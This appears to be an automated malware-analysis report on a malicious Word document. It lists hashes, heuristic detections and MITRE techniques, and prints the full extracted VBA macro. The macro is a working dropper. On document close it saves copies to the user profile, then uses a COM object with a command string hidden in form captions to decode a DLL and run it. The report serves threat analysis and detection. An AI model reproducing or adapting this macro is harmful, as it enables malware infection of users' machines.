Office (OLE) malware analysis — malicious · 10af5707c8f1a59c

MALICIOUS

Office (OLE)

114.5 KB Created: 2020-05-12 23:48:00 Authoring application: Microsoft Office Word First seen: 2020-09-15

MD5: f567b6c855c603df4fc914ce307de065 SHA-1: cf2d28b6799c2e47c71e4d4007acdb0c70f2c092 SHA-256: 10af5707c8f1a59c31d0f57d99f6ca4386ba7cadd3b6b71a0eac05eacf631f5e

170 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information

The sample contains VBA macros that leverage `CreateObject` and `Environ()` calls, indicating an attempt to interact with the system environment. The heuristic `SC_STR_CERTUTIL` suggests the use of certutil for downloading or decoding, which is often used to fetch and prepare malicious payloads. The VBA script attempts to save multiple files with `.xls`, `.doc`, and `.pub` extensions to the user's profile directory, likely as part of a multi-stage infection process.

Heuristics 6

ClamAV: Win.Malware.Agent-9662178-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Malware.Agent-9662178-0
Reference to certutil (download/decode) high SC_STR_CERTUTIL

Reference to certutil (download/decode)
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Private Sub OpenForm()
    Set MainClass = CreateObject(ThisDocument.DefaultTargetFrame)
End Sub

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

    Debug.Print "Please fill in the form": OpenForm
    Temporary = Environ$("USERPROFILE") + "\j5Iss52"
    ActiveDocument.SaveAs2 FileName:=Temporary + ".xls", FileFormat:=wdFormatText

Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2739 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2739 bytes
SHA-256: `a8cd5138d3ab8dd79e1c1b682137f1d4c0dd29317e2adcf55e341402f0c2b15a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private MainClass Private Temporary As String Private Sub Document_Close() Debug.Print "Please fill in the form": OpenForm Temporary = Environ$("USERPROFILE") + "\j5Iss52" ActiveDocument.SaveAs2 FileName:=Temporary + ".xls", FileFormat:=wdFormatText ActiveDocument.SaveAs2 FileName:=Temporary + ".doc", FileFormat:=wdFormatText MainClass.create Right(UserForm2.Caption, 9) + Right(UserForm2.Tag, 11) + Temporary + ".xls " + Temporary + ".dll", Null, Null, Data ActiveDocument.SaveAs2 FileName:=Temporary + ".pub", FileFormat:=wdFormatText ActiveDocument.SaveAs2 FileName:=Temporary + ".doc", FileFormat:=wdFormatText ActiveDocument.SaveAs2 FileName:=Temporary + ".pub", FileFormat:=wdFormatText ActiveDocument.SaveAs2 FileName:=Temporary + ".doc", FileFormat:=wdFormatText ActiveDocument.SaveAs2 FileName:=Temporary + ".pub", FileFormat:=wdFormatText ActiveDocument.SaveAs2 FileName:=Temporary + ".doc", FileFormat:=wdFormatText ActiveDocument.SaveAs2 FileName:=Temporary + ".pub", FileFormat:=wdFormatText ActiveDocument.SaveAs2 FileName:=Temporary + ".doc", FileFormat:=wdFormatText ActiveDocument.SaveAs2 FileName:=Temporary + ".pub", FileFormat:=wdFormatText ActiveDocument.SaveAs2 FileName:=Temporary + ".doc", FileFormat:=wdFormatText ActiveDocument.SaveAs2 FileName:=Temporary + ".pub", FileFormat:=wdFormatText ActiveDocument.SaveAs2 FileName:=Temporary + ".doc", FileFormat:=wdFormatText MainClass.create Right(UserForm1.Caption, 9) + Temporary + ".dll,R1", Null, Null, Data2 End Sub Private Sub OpenForm() Set MainClass = CreateObject(ThisDocument.DefaultTargetFrame) End Sub Attribute VB_Name = "Module1" Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{D8E25750-9D2E-4384-9754-171AA2B4A308}{9A6DBDD8-A9C9-497E-A259-969313144A71}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub TextBox1_Change() End Sub Attribute VB_Name = "UserForm2" Attribute VB_Base = "0{70E3F0BA-B642-42C4-BF63-096A6CB988DB}{6F03AE86-629E-4CCE-A909-B9F9B868A1BD}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: a8cd5138d3ab8dd79e1c1b682137f1d4c0dd29317e2adcf55e341402f0c2b15a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private MainClass
Private Temporary As String

Private Sub Document_Close()
    Debug.Print "Please fill in the form": OpenForm
    Temporary = Environ$("USERPROFILE") + "\j5Iss52"
    ActiveDocument.SaveAs2 FileName:=Temporary + ".xls", FileFormat:=wdFormatText
    ActiveDocument.SaveAs2 FileName:=Temporary + ".doc", FileFormat:=wdFormatText
    MainClass.create Right(UserForm2.Caption, 9) + Right(UserForm2.Tag, 11) + Temporary + ".xls " + Temporary + ".dll", Null, Null, Data
    ActiveDocument.SaveAs2 FileName:=Temporary + ".pub", FileFormat:=wdFormatText
    ActiveDocument.SaveAs2 FileName:=Temporary + ".doc", FileFormat:=wdFormatText
    ActiveDocument.SaveAs2 FileName:=Temporary + ".pub", FileFormat:=wdFormatText
    ActiveDocument.SaveAs2 FileName:=Temporary + ".doc", FileFormat:=wdFormatText
    ActiveDocument.SaveAs2 FileName:=Temporary + ".pub", FileFormat:=wdFormatText
    ActiveDocument.SaveAs2 FileName:=Temporary + ".doc", FileFormat:=wdFormatText
    ActiveDocument.SaveAs2 FileName:=Temporary + ".pub", FileFormat:=wdFormatText
    ActiveDocument.SaveAs2 FileName:=Temporary + ".doc", FileFormat:=wdFormatText
    ActiveDocument.SaveAs2 FileName:=Temporary + ".pub", FileFormat:=wdFormatText
    ActiveDocument.SaveAs2 FileName:=Temporary + ".doc", FileFormat:=wdFormatText
    ActiveDocument.SaveAs2 FileName:=Temporary + ".pub", FileFormat:=wdFormatText
    ActiveDocument.SaveAs2 FileName:=Temporary + ".doc", FileFormat:=wdFormatText
    MainClass.create Right(UserForm1.Caption, 9) + Temporary + ".dll,R1", Null, Null, Data2
End Sub

Private Sub OpenForm()
    Set MainClass = CreateObject(ThisDocument.DefaultTargetFrame)
End Sub


Attribute VB_Name = "Module1"

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{D8E25750-9D2E-4384-9754-171AA2B4A308}{9A6DBDD8-A9C9-497E-A259-969313144A71}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()

End Sub

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{70E3F0BA-B642-42C4-BF63-096A6CB988DB}{6F03AE86-629E-4CCE-A909-B9F9B868A1BD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.